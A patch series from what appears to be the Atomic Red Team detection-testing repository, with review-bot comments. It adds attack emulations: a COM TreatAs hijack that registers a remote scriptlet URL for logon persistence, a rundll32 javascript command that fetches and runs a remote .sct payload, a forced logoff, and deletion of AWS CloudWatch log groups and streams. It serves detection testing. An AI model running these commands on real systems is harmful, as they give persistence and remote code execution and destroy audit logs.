\"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\" + /ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\" + /ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\" + /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe + -sta \"AtomicTest\" " + cleanup_command: |- + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f + name: powershell T1137.004: technique: x_mitre_platforms: diff --git a/atomics/T1546.015/T1546.015.md b/atomics/T1546.015/T1546.015.md index ce6a555d..7eb9d858 100644 --- a/atomics/T1546.015/T1546.015.md +++ b/atomics/T1546.015/T1546.015.md @@ -12,6 +12,8 @@ Adversaries can use the COM system to insert malicious code that can be executed - [Atomic Test #3 - COM Hijacking with RunDLL32 (Local Server Switch)](#atomic-test-3---com-hijacking-with-rundll32-local-server-switch) +- [Atomic Test #4 - COM hijacking via TreatAs](#atomic-test-4---com-hijacking-via-treatas) +
@@ -162,4 +164,61 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato +
+
+ +## Atomic Test #4 - COM hijacking via TreatAs +This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute. +Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The +test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out. + +References: + +https://youtu.be/3gz1QmiMhss?t=1251 + +https://github.com/enigma0x3/windows-operating-system-archaeology + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 33eacead-f117-4863-8eb0-5c6304fbfaa9 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\\WINDOWS\\system32\\scrobj.dll" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f +reg add 
"HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f + +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f + +rundll32.exe -sta "AtomicTest" +``` + +#### Cleanup Commands: +```powershell +reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f +reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f +reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f +``` + + + + +
From f6b385f8602e8c7a8d8507546e3d91a6624a1993 Mon Sep 17 00:00:00 2001 From: tccontre <26181693+tccontre@users.noreply.github.com> Date: Fri, 29 Jul 2022 17:13:53 +0200 Subject: [PATCH 07/22] Update T1529.yaml (#2055) * Update T1529.yaml * add malware example to description Co-authored-by: Carrie Roberts --- atomics/T1529/T1529.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/atomics/T1529/T1529.yaml b/atomics/T1529/T1529.yaml index bfbf82be..de248b1b 100644 --- a/atomics/T1529/T1529.yaml +++ b/atomics/T1529/T1529.yaml @@ -123,3 +123,19 @@ atomic_tests: poweroff --reboot name: bash elevation_required: true +- name: Logoff System - Windows + auto_generated_guid: 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 + description: | + This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor) + supported_platforms: + - windows + input_arguments: + timeout: + description: Timeout period before shutdown (seconds) + type: Integer + default: 1 + executor: + command: | + shutdown /l /t #{timeout} + name: command_prompt + elevation_required: true From 5849c1516b46f806d372bddc47c2e16f085a5ac2 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Fri, 29 Jul 2022 15:14:16 +0000 Subject: [PATCH 08/22] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 448eadfb..e27e592f 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1098,3 +1098,4 @@ ae9b2e3e-efa1-4483-86e2-fae529ab9fb6 a27418de-bdce-4ebd-b655-38f11142bf0c 1e40bb1d-195e-401e-a86b-c192f55e005c 33eacead-f117-4863-8eb0-5c6304fbfaa9 +3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 From 6f92864b889f60df38b2a7208d2d1dd96ccb59bc Mon Sep 17 00:00:00 2001 
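Review bot: The new executor runs `shutdown /l /t #{timeout}`, but the documented behaviour of `shutdown /l` is an immediate logoff with no time-out period, so the `timeout` input argument is at best ignored and the combination may not even be accepted; verify on a Windows host, and either drop the argument or document that it has no effect. The input description `Timeout period before shutdown (seconds)` also says "shutdown" for what is a logoff test. `elevation_required: true` is likely unnecessary for logging off one's own session; confirm before keeping it, since it hides that the technique works from an unprivileged token. Because the command logs off the session executing it, a runner driving the test interactively or over a remote session will lose that session; a sentence in the description such as `Note: this test logs off the current user, which ends the session running the test.` would help operators plan for it.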
From: Atomic Red Team doc generator Date: Fri, 29 Jul 2022 15:14:22 +0000 Subject: [PATCH 09/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 19 ++++++++++ atomics/T1529/T1529.md | 35 +++++++++++++++++++ 6 files changed, 58 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 060e2d4e..4e6c0b83 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -1290,6 +1290,7 @@ impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70a impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash +impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index ec7db3cd..7160dbb3 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -931,6 +931,7 @@ impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1 impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt +impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index abe3650f..9c728cb9 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -2216,6 +2216,7 @@ - Atomic Test #7: Reboot System via `halt` - Linux [linux] - Atomic Test #8: Shutdown System via `poweroff` - Linux [linux] - Atomic Test #9: Reboot System via `poweroff` - Linux [linux] + - Atomic Test #10: Logoff System - Windows [windows] # initial-access - [T1133 External Remote Services](../../T1133/T1133.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 32fec16c..79c3f983 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -1583,6 +1583,7 @@ - [T1529 System Shutdown/Reboot](../../T1529/T1529.md) - Atomic Test #1: Shutdown System - Windows [windows] - Atomic Test #2: Restart System - Windows [windows] + - Atomic Test #10: Logoff System - Windows [windows] # initial-access - [T1133 External Remote Services](../../T1133/T1133.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index d9b81102..79a3ad66 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -96626,6 +96626,25 @@ impact: ' name: bash elevation_required: true + - name: Logoff System - Windows + auto_generated_guid: 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 + description: 'This test performs a Windows system logoff as seen in [dcrat backdoor + capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor) + + ' + supported_platforms: + - windows + input_arguments: + timeout: + description: Timeout period before shutdown (seconds) + type: Integer + default: 1 + executor: + command: 'shutdown /l /t #{timeout} + + ' + name: command_prompt + elevation_required: true initial-access: T1133: technique: diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md index 7ea68bd4..08bebfec 100644 --- a/atomics/T1529/T1529.md +++ b/atomics/T1529/T1529.md @@ -24,6 +24,8 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other - [Atomic Test #9 - Reboot System via `poweroff` - Linux](#atomic-test-9---reboot-system-via-poweroff---linux) +- [Atomic Test #10 - Logoff System - Windows](#atomic-test-10---logoff-system---windows) +
@@ -296,4 +298,37 @@ poweroff --reboot +
+
+ +## Atomic Test #10 - Logoff System - Windows +This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor) + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| timeout | Timeout period before shutdown (seconds) | Integer | 1| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +shutdown /l /t #{timeout} +``` + + + + + +
From e712150c213ff8925499e91a299ac27b45ee98e1 Mon Sep 17 00:00:00 2001 From: lucasRiley <70220074+lucasRiley@users.noreply.github.com> Date: Fri, 29 Jul 2022 17:31:23 -0500 Subject: [PATCH 10/22] T1218.011 Improvement (#2058) Co-authored-by: Riley Co-authored-by: Carrie Roberts --- atomics/T1218.011/T1218.011.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index c8f9f654..698a9a70 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -2,7 +2,6 @@ attack_technique: T1218.011 display_name: 'Signed Binary Proxy Execution: Rundll32' atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject - auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be description: | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. supported_platforms: @@ -14,7 +13,9 @@ atomic_tests: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct executor: command: | - rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); + start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); + cleanup_command: | + taskkill /IM notepad.exe /f name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb From 023e149ac5f517412f4eb249e7f90c7ad0399254 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Fri, 29 Jul 2022 22:31:53 +0000 Subject: [PATCH 11/22] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1218.011/T1218.011.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 698a9a70..6e158223 100644 
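Review bot: The first hunk deletes `auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be`, which does not look intended: the GUID generator then assigns a fresh value in PATCH 11 (`57ba4ce9-...`) and every index is rewritten, so anything keyed on the old GUID (detection-coverage mappings, earlier run logs) silently loses its reference — restoring that one line keeps the test's identity stable. In the second hunk `cleanup_command: taskkill /IM notepad.exe /f` terminates every notepad.exe on the host, not only the instance the payload spawned, which can destroy an operator's unsaved work; either narrow the cleanup to processes started after the test or state that side effect in the description. Because `start /b` returns before rundll32 has fetched and run the remote .sct, a cleanup executed immediately afterwards may race the payload; a brief wait in the cleanup, or a comment noting the race, would help.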
--- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -2,6 +2,7 @@ attack_technique: T1218.011 display_name: 'Signed Binary Proxy Execution: Rundll32' atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject + auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d description: | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e27e592f..1235e5f5 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1099,3 +1099,4 @@ a27418de-bdce-4ebd-b655-38f11142bf0c 1e40bb1d-195e-401e-a86b-c192f55e005c 33eacead-f117-4863-8eb0-5c6304fbfaa9 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 +57ba4ce9-ee7a-4f27-9928-3c70c489b59d From 3a5209a4fc49c847f3b47f2820717cbef98ae403 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Fri, 29 Jul 2022 22:32:00 +0000 Subject: [PATCH 12/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +- atomics/Indexes/index.yaml | 8 ++++++-- atomics/T1218.011/T1218.011.md | 8 ++++++-- 4 files changed, 14 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 4e6c0b83..0f140af2 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -1,5 +1,5 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt +defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 7160dbb3..9748317b 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -1,5 +1,5 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt +defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 79a3ad66..a944ce29 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -240,7 +240,7 @@ defense-evasion: identifier: T1218.011 atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject - auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be + auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. @@ -253,7 +253,11 @@ defense-evasion: type: Url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct executor: - command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); + command: 'start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication + ";document.write();GetObject("script:#{file_url}").Exec(); + + ' + cleanup_command: 'taskkill /IM notepad.exe /f ' name: command_prompt diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index 8bc8b5c9..de88a8c0 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -45,7 +45,7 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe **Supported Platforms:** Windows -**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be +**auto_generated_guid:** 57ba4ce9-ee7a-4f27-9928-3c70c489b59d @@ -61,9 +61,13 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe ```cmd -rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); +start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); ``` +#### Cleanup Commands: +```cmd +taskkill /IM notepad.exe /f +``` From 7ac7517321d44a3715580e7d0ddb28b124d10e13 Mon Sep 17 00:00:00 2001 
From: gowthamarajr Date: Sat, 30 Jul 2022 17:18:08 -0400 Subject: [PATCH 13/22] Update T1562.008 Update T1562.008 by adding AWS CloudWatch Log Group Deletes & AWS CloudWatch Log Stream Deletes --- atomics/T1562.008/T1562.008.yaml | 67 +++++++++++++++++++++++++++++++- 1 file changed, 66 insertions(+), 1 deletion(-) diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index 5734d5bc..3c17aa43 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml @@ -127,7 +127,6 @@ atomic_tests: Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True name: powershell elevation_required: false - - name: Disable CloudTrail Logging Through Event Selectors via Stratus auto_generated_guid: a27418de-bdce-4ebd-b655-38f11142bf0c description: | 
@@ -181,3 +180,69 @@ atomic_tests: ./stratus cleanup --all name: sh elevation_required: false +- name: AWS CloudWatch Log Group Deletes + auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121 + description: | + Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by + deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion + supported_platforms: + - iaas:aws + input_arguments: + cloudwatch_log_group_name: + description: Name of the cloudWatch log group + type: String + default: "log-test" + region: + description: Name of the region + type: String + default: "us-east-1" + dependencies: + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure + executor: + command: | + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + cleanup_command: + name: sh + elevation_required: false +- name: AWS CloudWatch Log Stream Deletes + auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932 + description: | + Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by + deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. 
https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html + supported_platforms: + - iaas:aws + input_arguments: + cloudwatch_log_group_name: + description: Name of the cloudWatch log group + type: String + default: "test-logs" + cloudwatch_log_stream_name: + description: Name of the cloudWatch log stream + type: String + default: "20150601" + region: + description: Name of the region + type: String + default: "us-west-2" + dependencies: + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure + executor: + command: | + aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + cleanup_command: + name: sh + elevation_required: false \ No newline at end of file From b33bcb6cd4cbb3159ed871dbf810222561b39f7b Mon Sep 17 00:00:00 2001 From: gowthamarajr Date: Sat, 30 Jul 2022 17:28:51 -0400 Subject: [PATCH 14/22] Update T1562.008 --- atomics/T1562.008/T1562.008.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index 3c17aa43..03e5b4b9 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml 
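Review bot: `aws logs create-log-stream` and `aws logs delete-log-stream` are issued without `--region #{region}` while the surrounding `create-log-group`/`delete-log-group` calls pass it, so whenever the profile's default region differs from `#{region}` (default `us-west-2` here) the stream calls go to another region and fail; add `--region #{region}` to both — the same lines are carried unchanged through the hunks in PATCH 14 and PATCH 15. `cleanup_command:` is left empty in both new tests even though the executor creates resources, so a failure part-way leaves the group behind; the cleanup should repeat `aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region}` with its error ignored. The prereq `cat ~/.aws/credentials | grep "default"` can be `grep -q '^\[default\]' ~/.aws/credentials`, which avoids the pipe and does not match the word anywhere in the file. Smaller points: the first test's description says it deletes "the log stream" although it deletes a log group, the two tests default `region` to different values (`us-east-1` vs `us-west-2`) without a stated reason, and `defult` in the get_prereq message is a typo.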
@@ -201,11 +201,11 @@ atomic_tests: Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | cat ~/.aws/credentials | grep "default" - aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json get_prereq_command: | echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json cleanup_command: name: sh @@ -235,12 +235,12 @@ atomic_tests: Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | cat ~/.aws/credentials | grep "default" - aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} get_prereq_command: | echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json cleanup_command: From 614a715da87f550cedcfd6480a6913971788f81e Mon Sep 17 00:00:00 2001 From: gowthamarajr Date: Sat, 30 Jul 2022 17:37:06 -0400 Subject: [PATCH 15/22] Update 1562.008.yml --- atomics/T1562.008/T1562.008.yaml | 6 ++++++ 1 file changed, 6 insertions(+) 
diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index 03e5b4b9..b40317e7 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml @@ -206,7 +206,9 @@ atomic_tests: executor: command: | aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" cleanup_command: name: sh elevation_required: false @@ -240,9 +242,13 @@ atomic_tests: executor: command: | aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + echo "*** Log Stream Created ***" aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + echo "*** Log Stream Deleted ***" aws logs delete-log-group --log-group-name 